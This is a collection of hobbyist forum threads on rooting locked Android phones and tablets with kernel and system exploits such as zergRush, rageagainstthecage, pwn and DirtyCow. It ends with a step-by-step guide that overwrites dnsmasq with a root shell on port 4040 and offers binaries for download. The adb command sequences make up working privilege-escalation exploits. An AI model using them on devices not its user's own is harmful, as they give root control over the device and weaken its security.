Attempt to get root on Android 5 with locked bootloader - Galaxy Note 4 Q&A, Help & Troubleshooting

Hello everyone. I'm owner of Verizon version of Note 4 - N910V. Unfortunately, I've found that it has locked bootloader after I've bought it. It's even impossible to get root on Android 5.
I don't want to accept it, and going to try to get at least temporary root on that smartphone.
Why it is possible:
- it's matter of vulnerability. KingRoot is able to root latest Android 4.4, even with locked bootloader
- Android 5 was released more than 2 years ago, there was enough time to reveal some vulnerabilities, that we have in our ROMs
- Linux kernel we use is pretty old too: linux 3.10.40 was released in May 2014
- VTS for Android shows several existing vulnerabilities, that gives system-level privileges
Plan:
- Get system-level privileges
- Get root level privileges
- Get permanent root (bypass write protection)
Progress:
- How to run busybox through adb shell:
Download busybox executive from https://busybox.net/downloads/binaries/latest/
copy it to phone: adb push busybox-armv7l /data/local/tmp/
Run adb shell and execute commands
Code:
cd /data/local/tmp/
chmod 755 busybox-armv7l
mkdir busybox
for app in $(../busybox-armv7l --list); do ln -s ../busybox-armv7l $app; done
export PATH=$PATH:/data/local/tmp/busybox
Enjoy
Repeat last command on every adb shell session
Current:
I'm going to use CVE-2015-1528 vulnerability to try to get system-level privileges
This thread I'm opening to share my progress and to get any advices/help with this.

Sounds interesting. Keep us informed!
Sent from my SM-N910F using Tapatalk

Quick update. I switched to CVE-2015-3825 vulnerability. I should work on any Android by 5.1, it seems easier because you need to exploit only one service, and there is good documentation: https://www.usenix.org/system/files/conference/woot15/woot15-paper-peles.pdf.
Despite I understand how to use this vulnerability, unfortunately, I'm not Android developer, nor low-level hacker, so it may takes sometime for me to implement them all.
I've started work on this exploit already. Any help is appreciated.

Has somebody done successfully temporary root his retail edition Android 5 Note 4 with KingRoot 4.8.1? One guy from sibling thread said that he did it successfully on 5.1.1 android

Related

[Q] Should my zergRush rooting remain after reboot ?

Hi
I have rooted my Fire with zergRush and confirmed with adb shell
Code:
# id
uid=0 gid=0
but after rebooting the Fire it seems to have gone as the prompt returned to $
Is this usual?
I'm on a MAC and the Fire is 6.2. I can root again but obviously it would be good if it remained after a reboot.
Any help would be much appreciated
edit: but now I'm not so sure.. SU from adb shell returns 'not found' and when running a terminal app I have on the Fire the prompt is $ and SU returns 'permission denied'.
I'm not really one who should answer this as I'll not really up on the different exploits used for rooting but...
My understanding was that zergRush got you a temporary root which was enough to enable you to remount /system as RW which then let's you install su and busybox and the superuser.apk which then gives you permanent root.
Sent from my Kindle Fire using Tapatalk
Like bsoplinger said,
zergRush is the exploit most are using to gain root, and then while having root allow you to install tools which survive the reboot cycle to continue to provide root from that point on.
Busybox, su and superuser are those tools.
Thanks very much, certainly gives me more to go on although I'm a bit confused as to when I should be installing tools using adb and when I should be using a file manager. Probably neither and I have the wrong end of the stick no probs.. on on
edit: I think I've got it... can't thank you enough your advice has saved me hours I'm sure but I will wait till the morning. I'd rather brick it with a fresh head than the one on my shoulders now.

[Q] How can i get ADB ROOT? i want to know rageagainstthecage's working principle

hi,guys!
as this title says i found a tool named "rageagainstthecage",but i want to know how dose it work.Can anyone help me ? thanks
try superoneclick
Are you using Linux to grant root access on your Defy?
I rooted mine yestarday and I was a little confused on how to make it, I have same file as you as I read. rageagainstthecage is the exploit that will you grant root privileges. The instructions for linux are here [1]. I replaced 'exploit.bin' with 'rageagainstthecage' or you can use the one provided in that post 'psneuter', the proccess is simple
1. Copy files to phone using adb (I used /data/local/tmp as directory in the phone): su, busybox, Superuser.apk and exploit (exploit name, let's say: rageagainstthecage)
2. Make the exploit executable and execute it
3. Give permissions to the commands su and busybox
4. There you go
All the credits for the autor of the post on IBM forum
I hope this help you with your question
[1]
PHP:
www_ibm_com/developerworks/mydeveloperworks/blogs/coolwinding/entry/how_to_root_defy_on_linux1
jianbangguo said:
try superoneclick
Click to expand...
Click to collapse
Dose the superoneclick use "rageagainstthecage" to grant adb root access? i just want to know "rageagainstthecage", how dose it work? can you help me? thanks
cristianpark said:
Are you using Linux to grant root access on your Defy?
I rooted mine yestarday and I was a little confused on how to make it, I have same file as you as I read. rageagainstthecage is the exploit that will you grant root privileges. The instructions for linux are here [1]. I replaced 'exploit.bin' with 'rageagainstthecage' or you can use the one provided in that post 'psneuter', the proccess is simple
1. Copy files to phone using adb (I used /data/local/tmp as directory in the phone): su, busybox, Superuser.apk and exploit (exploit name, let's say: rageagainstthecage)
2. Make the exploit executable and execute it
3. Give permissions to the commands su and busybox
4. There you go
All the credits for the autor of the post on IBM forum
I hope this help you with your question
[1]
PHP:
www_ibm_com/developerworks/mydeveloperworks/blogs/coolwinding/entry/how_to_root_defy_on_linux1
Click to expand...
Click to collapse
pardon my poor english,I just want to know how dose it work, for example : rageagainstthecage's Working principle,not how to use "rageagainstthecage" to grant root access,thank you !!
The principle of how it works is very simple, the rageinthecage exploit just forks proccesses until the proccessor hits the max, then the system will kill the olders apps, because you are using adb and running psneuter, the system will kill the adb shell, and here is the magic, when you restart the adb shell it start with root rights, to prevent that, inmediatly adb starts, the system calls setuid function, but because the proccesses list is full, the explot prevents the setuid call, allowing you to maintain the root rights, and in that point, you push Superuser.apk to allow the root access to the apps, changin before the permissions to the su binary allowing you to call that binary with a less rights user, that is the idea beyond the exploit!, wish that help you!
Sorry for the bad english
LeonardoJegigzem said:
The principle of how it works is very simple, the rageinthecage exploit just forks proccesses until the proccessor hits the max, then the system will kill the olders apps, because you are using adb and running psneuter, the system will kill the adb shell, and here is the magic, when you restart the adb shell it start with root rights, to prevent that, inmediatly adb starts, the system calls setuid function, but because the proccesses list is full, the explot prevents the setuid call, allowing you to maintain the root rights, and in that point, you push Superuser.apk to allow the root access to the apps, changin before the permissions to the su binary allowing you to call that binary with a less rights user, that is the idea beyond the exploit!, wish that help you!
Sorry for the bad english
Click to expand...
Click to collapse
Great info, thanks for sharing this with us I was wondering the same

root on locked bootloader KITKAT ? ? :(

im curious if there is any way to push "su" to the the system?
i mean cmon there are pleanty of KITKAT 4.4.2 fastboot files.
i have tried pushing "su" maually with "pwn" exploit.
tried with following exploits
-psneuter
-pwn
but no luck there.
any one pleaseeeee...im dieing here..
our system details.
- LOCKED BOOTLOADER ( )
- KIT KAT 4.4.2
- Blur_Version.183.46.10.XT907.Verizon.en.US ( KDA20.62-10.1 )
what i tried is
Code:
adb devices
adb push pwn /data/local/tmp
adb shell
$ cd /data/local/tmp
$ chmod 777 pwn
$ ./pwn
( NO LUCK GETTING PERMISSION AFTER $ ./pwn )
At this point, the exploit will run and close the shell. You will need to run these commands to restart the ADB server.
adb kill-server
adb devices
Now comes the moment of truth. Use the
adb shell
command to open a shell. If you see a "#" sign, you have root access, so go ahead and continue to the next part.
If not, you can go back and try the previous steps again
We now need to make this root permanent. From the root shell you just opened, type the following commands.
# mount -o remount,rw -t rfs /dev/block/st19 /system
# exit
adb push busybox /system/bin
adb push su /system/bin
adb install Superuser.apk
adb shell
# chmod 4755 /system/bin/busybox
# chmod 4755 /system/bin/su
# mount -o remount,ro -t rfs /dev/block/st19 /system
# exit
adb reboot
gys lets make this happen any how.....lets roll...
even this wont work
http://www.kingoapp.com/
Every root method I've ever found for KK requires an unlocked bootloader, and I'm talking about looking outside the box at all different brands/models of phones too. I guess Google finally figured how to lock things up as well as Apple. I've read XDA user "jcase" had discovered a KK exploit that works on some Motorolas, but he's keeping it secret for some mysterious reason and will be presenting it at a Black Hat conference. Why anyone would rather help companies than consumers is beyond my comprehension, but it is what it is.
GnatGoSplat said:
Every root method I've ever found for KK requires an unlocked bootloader, and I'm talking about looking outside the box at all different brands/models of phones too. I guess Google finally figured how to lock things up as well as Apple. I've read XDA user "jcase" had discovered a KK exploit that works on some Motorolas, but he's keeping it secret for some mysterious reason and will be presenting it at a Black Hat conference. Why anyone would rather help companies than consumers is beyond my comprehension, but it is what it is.
Click to expand...
Click to collapse
Every exploit has two sides to it: it can be used more or less legitimately by users to obtain root privileges, but it can be also abused by rogue apps to gain control over someone else's device.
When you find an exploit, the sooner you publish it, the sooner it will be patched in a firmware update, making it unusable any more for gaining root privileges. And since you've published it, the bad guys can make their use of it as well.
Patching existing vulnerabilities by companies is natural and essentially made in favour of user's safety.
The specific timing of releasing details about some found vulnerability can be part of a tactic - you can give users a window for gaining root just after a specific expected firmware release for some device. If an exploit is published too soon, it will be patched in an upcoming firmware update and no one will be able to use it for rooting...
means that there is a possible way of course but the thing is will it could be found by or not......
of course for good reasons.......

[DirtyCow][Linux]Vulnerability Test Suite

Hi guys,
i made a small test suite to test vulnerability to CVE-2016-5195 on Linux-based systems.
This is 99.9% the work of the author of the exploit, i just made some minor changes to transform this into a test suite.
Download: DirtyCow Test-Suite
Important: Activate USB-Debugging to get adb-shell running!
How-to-test:
Code:
Download the test suite from above server
Unpack the .zip
Attach your device via USB to your PC
./testvuln.sh
If vulnerable, you should see this:
Code:
202 KB/s (10000 bytes in 0.048s)
131 KB/s (5904 bytes in 0.043s)
Running exploit, may take some time
UID=0(root), your device is vulnerable!
Otherwise if not vulnerable something like this:
Code:
140 KB/s (10000 bytes in 0.069s)
133 KB/s (5904 bytes in 0.043s)
Running exploit, may take some time
run-as: Usage:
run-as <package-name> [--user <uid>] <command> [<args>]
Source (You can build it yourself via ndk):
https://www.androidfilehost.com/?fid=457095661767106997
Hint: Should work on all ARMv8 devices!
As I understand this would give a root adb shell and therefore I could root my Z5 Compact and install supersu? I only want to remove some garbage apps without unlocking the Boatloader.
tavoc said:
As I understand this would give a root adb shell and therefore I could root my Z5 Compact and install supersu? I only want to remove some garbage apps without unlocking the Boatloader.
Click to expand...
Click to collapse
This elevates privileges of a process. If you want a root shell you must do some modifications to the code, but this can potentially root all DirtyCow affected devices.
Thanks, I will have a look at your code. Maybe a github account would be nice for Pull request etc.
tavoc said:
Thanks, I will have a look at your code. Maybe a github account would be nice for Pull request etc.
Click to expand...
Click to collapse
Best thing you can do is fork this, i made some changes which contradict your desire of a root tool.
So this script is not working under Windows, ist that right?
So we can get root shell? but I don't think we can change the system partition without kernel changing right?
Or we can?
My question is can we root the device with this method?
DannyWilde said:
So this script is not working under Windows, ist that right?
Click to expand...
Click to collapse
For windows,download adb tools, copy all binary to adb folder and enter following in a terminal:
Code:
adb push dirtycow /data/local/tmp/dirtycow
adb push run-as /data/local/tmp/run-as
adb shell 'chmod 777 /data/local/tmp/run-as'
adb shell '/data/local/tmp/dirtycow /system/bin/run-as /data/local/tmp/run-as'
adb shell /system/bin/run-as
sijav said:
So we can get root shell? but I don't think we can change the system partition without kernel changing right?
Or we can?
My question is can we root the device with this method?
Click to expand...
Click to collapse
1. Yes
2. Yes
3. Yes, potentially
Tommy-Geenexus said:
For windows,download adb tools, copy all binary to adb folder and enter following in a terminal:
Code:
adb push dirtycow /data/local/tmp/dirtycow
adb push run-as /data/local/tmp/run-as
adb shell 'chmod 777 /data/local/tmp/run-as'
adb shell '/data/local/tmp/dirtycow /system/bin/run-as /data/local/tmp/run-as'
adb shell /system/bin/run-as
Click to expand...
Click to collapse
on
adb shell 'chmod 777 /data/local/tmp/run-as'
adb shell '/data/local/tmp/dirtycow /system/bin/run-as /data/local/tmp/run-as'
i get "not found"
on
adb shell /system/bin/run-as
i get "run-as: Usage:
run-as <package-name> [--user <uid>] <command> [<args>]"
run-as process has only 2 capabilities(setuid/setgid), also with selinux restriction, it cannot exec any shell even get elevated privilege ...
super_apache said:
run-as process has only 2 capabilities(setuid/setgid), also with selinux restriction, it cannot exec any shell even get elevated privilege ...
Click to expand...
Click to collapse
I know. This is not a root tool, this is just to test vulnerability.
Edit: Not sure if this was directed at me or the guy asking the root q, anyway this answers the root q.
Would be nice to have a working root exploit for Marshmallow. Keep us updated please'
To those asking about root (SuperSu) you must remember that with a locked bootloader you can't edit kernel or system partition.
As said elsewhere, there s no way to "root" without unlocking bl
ninestarkoko said:
Would be nice to have a working root exploit for Marshmallow. Keep us updated please'
To those asking about root (SuperSu) you must remember that with a locked bootloader you can't edit kernel or system partition.
As said elsewhere, there s no way to "root" without unlocking bl
Click to expand...
Click to collapse
This is the wrong thread then. I definitly do not have enough knowledge to get any kind of exploit working.
Best ping your favorite hacker and try to convince him to write an exploit.
ninestarkoko said:
Would be nice to have a working root exploit for Marshmallow. Keep us updated please'
To those asking about root (SuperSu) you must remember that with a locked bootloader you can't edit kernel or system partition.
As said elsewhere, there s no way to "root" without unlocking bl
Click to expand...
Click to collapse
Have a look at this thread. They managed to root the BLU R1 HD v6
http://forum.xda-developers.com/r1-hd/how-to/blu-r1-hd-v6-6-dirtycowed-f-amazon-root-t3490882/
Tommy-Geenexus said:
This is the wrong thread then. I definitly do not have enough knowledge to get any kind of exploit working.
Best ping your favorite hacker and try to convince him to write an exploit.
Click to expand...
Click to collapse
Sorry i misunderstood too. I thought you was planning to use it practically to create an exploit for MM.
I don't think it's necessary as we already have an exploit for LP, though it would be nice.
YuriRM said:
Have a look at this thread. They managed to root the BLU R1 HD v6
http://forum.xda-developers.com/r1-hd/how-to/blu-r1-hd-v6-6-dirtycowed-f-amazon-root-t3490882/
Click to expand...
Click to collapse
"WARNING UNLOCKING YOUR BOOTLOADER WILL WIPE DATA AND FACTORY RESET THE DEVICE"
they unlock the bootloader using fastboot command
How's everything going here? After reading various threads and Googling for hours, this seems to be the best chance to be able to permanently root the Z5 Compact with a locked bootloader.
Really hope you're onto something and are well rested after Christmas
wessok said:
How's everything going here? After reading various threads and Googling for hours, this seems to be the best chance to be able to permanently root the Z5 Compact with a locked bootloader.
Really hope you're onto something and are well rested after Christmas
Click to expand...
Click to collapse
Googleing for hours and didn't understand a simple sentence (in my post above) or the technical reasons behind that (in many threads) ? Stop your search now, unlock it and live happily.

[SM-P605V] Verizon Temporary Root & Bootloader Unlock Research

Further research proves this has been done before, although perhaps not on our device. While root in a technical sense, it's severely SElinux-limited & thus not of significant utility as it is. I've made some inroads re. patching init going toward full root, but nothing certain yet. Either way, what exists should be enough to get us to an unlocked bootloader if we can get our hands on the right CID & aboot.
------
This is how I achieved temproot on the P605V. This is not a permanent root as, since our tablets run a Samsung eMMC and are/should be vulnerable to the eMMC bug, if we have the right CID and aboot & if my understanding is correct, we can convert these to developer units and unlock their bootloader!
What this basically does is downgrade to a dirtycow-vulnerable kernel & launch a temporary root shell. At the moment it can't do much as it runs within dnsmasq's SElinux context, but it's a start.
This does not apply if you're on 4.4.2, there are probably better rooting methods then. Do not upgrade to 5.1.1 in that case as you will burn fuses and will be unable to downgrade back to 4.4.2.
However, we can still crossflash between 5.1.1 versions! For our tablet, there are two: P605VVRSDPL1 (latest, patched) and P605VVRUDOH2 (earlier, unpatched). You must downgrade to P605VVRUDOH2. You will need the P605VVRUDOH2 tar.md5 and Odin - this is covered extensively for every Samsung device (including the non-VZW version of ours) so I will not repeat it here.
Once you're on P605VVRUDOH2, go through the initial setup, enable Developer Tools, then enable ADB.
The manual process (compiling from source):
Spoiler
You will need to obtain the following (on Linux, not tested on Windows):
- the Android 22 NDK
- https://github.com/timwr/CVE-2016-5195
- https://github.com/freddierice/trident
0. If you don't yet have it installed, install the Android NDK. I don't usually compile for Android, so I installed Android Studio from https://developer.android.com/studio/#downloads and added NDK 22 from its menus. You can likely (and perhaps should) use an earlier NDK, such as 14 or 15. Your mileage may vary.
1. Extract CVE-2016-5195 and trident
2. In CVE-2016-5195, rename 'run-as.c' to 'old-run-as.c'
3. Copy 'reverse.c' from trident into CVE-2016-5195
4. In CVE-2016-5195, rename the copied 'reverse.c' to 'run-as.c' - we're basically replacing the original payload from CVE-2016-5195 with a reverse shell from trident
5. Edit the Makefile and replace the 'root: push' section as follows:
root: push
adb shell 'chmod 777 /data/local/tmp/dcow'
adb push libs/$(ARCH)/run-as /data/local/tmp/run-as
adb shell '/data/local/tmp/dcow /data/local/tmp/run-as /system/bin/dnsmasq'
6. Run 'make root'
7. On the tablet, go into Settings -> More networks -> Mobile Hotspot, and turn it on. You will need a SIMcard to do this, any SIM will do - even if the device is still Verizon-locked. As we've written our reverse root shell spawning code into dnsmasq, and dnsmasq as root, our shell will run as root as well!
8. Verify it worked by running 'adb shell' and running 'netstat' - you should see a process listening on 0.0.0.0:4040. That's our shell! If you run 'ps' you should also see /system/bin/dnsmasq followed by /system/bin/shell, both running as root.
9. Run 'adb forward tcp:4040 tcp:4040'
10. Run netcat to connect to the shell: 'nc localhost 4040' (on Windows, you can get a precompiled netcat binary from http://nmap.org/dist/ncat-portable-5.59BETA1.zip )
11. Profit!
The precompiled process (easier, binaries attached to this post):
Spoiler
1. Download and unzip the attached package.
2. Open up a shell/command prompt, change into the directory you unzipped the files into, and run:
adb push dcow /data/local/tmp/dcow
adb push rshell /data/local/tmp/rshell
adb shell 'chmod 777 /data/local/tmp/*'
adb shell '/data/local/tmp/dcow /data/local/tmp/rshell /system/bin/dnsmasq'
3. On the tablet, go into Settings -> More networks -> Mobile Hotspot, and turn it on. You will need a SIMcard to do this, any SIM will do - even if the device is still Verizon-locked. As we've written our reverse root shell spawning code into dnsmasq, and dnsmasq as root, our shell will run as root as well!
4. Verify it worked by running 'adb shell' and running 'netstat' - you should see a process listening on 0.0.0.0:4040. That's our shell! If you run 'ps' you should also see /system/bin/dnsmasq followed by /system/bin/shell, both running as root.
5. Run 'adb forward tcp:4040 tcp:4040'
6. Run netcat to connect to the shell: 'nc localhost 4040' (on Windows, you can get a precompiled netcat binary from http://nmap.org/dist/ncat-portable-5.59BETA1.zip )
7. Profit!
Keep in mind, this is only temporary; a reboot will clear it and you'll have to exploit again. It is also not an extensive root as my end goal is to unlock the bootloader and get rid of the (awful) stock firmware.
Credits to timwr and all involved in the dirtycow exploit, freddierice for trident, as well as everyone on XDA whose research and comments over the past 4 years pointed me in the right direction. This tablet is still quite decent in 2020/2021, it deserves to be "free"!
----
As I understand it, as per @beaups https://github.com/beaups/SamsungCID & SamDunk, we will need two things - I hope someone in the community will volunteer these!
1. A dev-edition CID
2. An aboot dump from a dev-edition P605V (I'm not sure the regular P605 will work)
@ryanbg has made much inroad here as well. All input/assistance is appreciated!
Should these turn out to be unobtainium in some time, I will look into a permanent root solution.

Categories

Resources